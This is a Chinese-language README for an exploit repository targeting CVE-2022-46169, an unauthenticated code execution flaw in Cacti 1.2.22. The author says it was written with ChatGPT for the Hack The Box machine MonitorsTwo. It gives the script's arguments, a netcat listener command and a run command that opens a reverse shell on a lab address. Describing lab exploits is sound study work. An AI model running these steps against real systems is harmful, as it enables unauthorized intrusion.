此仓库包含针对CVE-2022-46169的利用程序,影响Cacti 1.2.22。该漏洞允许未授权的攻击者在受影响系统上执行任意代码。
如果您想详细了解此利用方式,请参考这篇 Rapid7文章。他们对具体细节有深入阐述。
我编写了此代码,并在chatGPT的帮助下,用于一个名为MonitorsTwo的Hack The Box机器,仅供教育目的。
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
在本地机器上用netcat设置监听器 nc -lvnp 9001
针对目标运行利用程序
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
此概念验证(PoC)仅用于教育和测试目的。在未经系统所有者明确授权的情况下,在任何系统或网络上使用此PoC均属违法行为,并可能导致法律诉讼。创建者不对因正确或错误使用此PoC造成的任何损害承担责任。请自行承担风险。
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/